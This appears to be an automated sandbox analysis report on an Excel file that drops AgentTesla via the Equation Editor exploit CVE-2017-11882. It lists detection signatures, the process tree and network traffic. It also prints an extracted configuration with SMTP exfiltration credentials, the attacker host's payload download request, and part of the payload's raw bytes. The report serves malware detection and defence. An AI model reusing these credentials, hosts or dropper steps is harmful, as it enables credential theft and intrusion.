Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report AGG POWER RFQ.xlsx

Overview

General Information

Sample Name:AGG POWER RFQ.xlsx
Analysis ID:435321
MD5:b6d32254c5e3faa7fb26cccabddad2f4
SHA1:abf474e378247ebeb3300de929a50d0996286c01
SHA256:fca7f5cda93c9f473a6c3e9c3857d19d69c25835fd71b21d8b1354f78b102397
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2596 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2392 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2908 cmdline: 'C:\Users\Public\vbc.exe' MD5: 42520170FE48AF70B3711BF86BDE77B0)
      • vbc.exe (PID: 1980 cmdline: C:\Users\Public\vbc.exe MD5: 42520170FE48AF70B3711BF86BDE77B0)
  • tnvLnx.exe (PID: 1664 cmdline: 'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe' MD5: 42520170FE48AF70B3711BF86BDE77B0)
    • tnvLnx.exe (PID: 152 cmdline: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe MD5: 42520170FE48AF70B3711BF86BDE77B0)
  • tnvLnx.exe (PID: 764 cmdline: 'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe' MD5: 42520170FE48AF70B3711BF86BDE77B0)
    • tnvLnx.exe (PID: 2564 cmdline: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe MD5: 42520170FE48AF70B3711BF86BDE77B0)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "sales5@alkhaleejautoparts.com]~%l3$ck*(U_mail.alkhaleejautoparts.comlisafury29@safina.cc"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 27 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.vbc.exe.3553848.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.vbc.exe.3553848.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                6.2.tnvLnx.exe.3553848.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  6.2.tnvLnx.exe.3553848.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    5.2.vbc.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 13 entries

                      Sigma Overview

                      Exploits:

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.141.146, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2392, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2392, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2392, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2908
                      Sigma detected: Execution from Suspicious FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2392, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2908

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmpMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "sales5@alkhaleejautoparts.com]~%l3$ck*(U_mail.alkhaleejautoparts.comlisafury29@safina.cc"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: AGG POWER RFQ.xlsxVirustotal: Detection: 27%Perma Link
                      Source: AGG POWER RFQ.xlsxReversingLabs: Detection: 21%

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: UInt32TypeInfo.pdb source: tnvLnx.exe, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp
                      Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB
                      Source: global trafficDNS query: name: mail.alkhaleejautoparts.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.141.146:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.141.146:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49166 -> 148.66.138.106:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49167 -> 148.66.138.106:587
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 148.66.138.106:587
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Jun 2021 10:20:52 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 16 Jun 2021 05:38:46 GMTETag: "111a00-5c4db81175295"Accept-Ranges: bytesContent-Length: 1120768Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 8e c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 8a 0c 00 00 8e 04 00 00 00 00 00 3e a9 0c 00 00 20 00 00 00 c0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 a8 0c 00 4b 00 00 00 00 c0 0c 00 00 8b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 0c 00 00 00 a2 a8 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 89 0c 00 00 20 00 00 00 8a 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 8b 04 00 00 c0 0c 00 00 8c 04 00 00 8c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 11 00 00 02 00 00 00 18 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 a9 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 27 01 00 e8 04 01 00 03 00 00 00 01 00 00 06 f4 2b 02 00 ae 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 14 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 bf 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 28 06 00 00 06 28 05 00 00 06 39 9c 00 00 00 26 20 04 00 00 00 38 67 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 17 3a 55 00 00 00 26 02 16 28 08 00 00 06 20 01 00 00 00 28 05 00 00 06 3a 3e 00 00 00 26 02 16 28 07 00 00 06 20 06 00 00 00 38 2c 00 00 00 02 16 28 11 00 00 0a 20 05 00 00 00 16 39 1a 00 00 00 26 02 16 28 09 00 00 06 38 32 00 00 00 20 04 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 9e ff ff ff c2 ff ff ff af ff ff ff 00 00 00 00 9e ff ff ff 74 ff ff ff 87 ff ff ff 10 00 00 00 38 aa ff ff ff 26 20 02 00 00 00 38 cb ff ff ff 2a 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 0d 00 00 06 2a 00 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0e 00 00 06 28 0f 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a
                      Source: Joe Sandbox ViewIP Address: 148.66.138.106 148.66.138.106
                      Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 148.66.138.106:587
                      Source: global trafficHTTP traffic detected: GET /win/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.146Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.146
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7AB3B46.emfJump to behavior
                      Source: global trafficHTTP traffic detected: GET /win/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.146Connection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: mail.alkhaleejautoparts.com
                      Source: vbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmpString found in binary or memory: http://DTHLcG.com
                      Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: vbc.exe, 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2367250713.0000000002894000.00000004.00000001.sdmpString found in binary or memory: http://gN3yhO7qZ2vk1Dl2x8.com
                      Source: vbc.exe, 00000005.00000002.2367334115.00000000028BB000.00000004.00000001.sdmpString found in binary or memory: http://mail.alkhaleejautoparts.com
                      Source: vbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: vbc.exe, 00000004.00000002.2155151223.0000000002401000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221949010.0000000002401000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: vbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: vbc.exe, 00000005.00000002.2367072067.00000000027C8000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: tnvLnx.exeString found in binary or memory: https://github.com/georgw777/
                      Source: tnvLnx.exeString found in binary or memory: https://github.com/georgw777/MediaManager
                      Source: vbc.exe, 00000004.00000000.2148405134.0000000000AD2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2366734790.0000000000AD2000.00000020.00020000.sdmp, tnvLnx.exe, 00000006.00000002.2221233725.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000007.00000000.2220311506.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmpString found in binary or memory: https://github.com/georgw777/MediaManager;https://github.com/georgw777/
                      Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                      Source: vbc.exe, 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: vbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 15 h . ' yellow bar above ,, This document is a ' 3. Once you have enab
                      .NET source code contains very large array initializationsShow sources
                      Source: 5.2.vbc.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b6F25B528u002d9522u002d4753u002dAD5Du002d2EB6462D9D13u007d/D22EEAA0u002d99FFu002d4867u002dB695u002dA5CAAFF01E6A.csLarge array initialization: .cctor: array initializer size 11963
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_002B9020
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_002BBB10
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_002BDBA0
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_002B549A
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_002BFBB0
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_002B2CC0
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_002B4EA0
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_002BAEEF
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02004668
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_0200927F
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_020062AB
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_020062D8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_020002E9
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_020002F8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02006F79
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02006F88
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02000007
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02009424
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02001027
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02000048
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02001058
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02004C59
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02004C88
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_020004C8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_020004D8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02005CD9
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02005CE8
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_0200490D
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02005530
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_02005540
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_020059DF
                      Source: C:\Users\Public\vbc.exeCode function: 4_2_020059F0
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_0022E240
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_0022DAE8
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00225330
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00226350
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00225678
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_0022E818
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_00222099
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079478A
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C0048
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C9A28
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C9160
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C33B0
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C89A0
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C0023
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_007CB2F8
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C3B70
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C7368
                      Source: C:\Users\Public\vbc.exeCode function: 5_2_007C3B6B
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00529020
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_0052C308
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_0052BB10
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_0052DBA0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_0052549A
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_0052FBB0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00522CC0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_0052AEEF
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00524EA0
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeCode function: 6_2_00711058
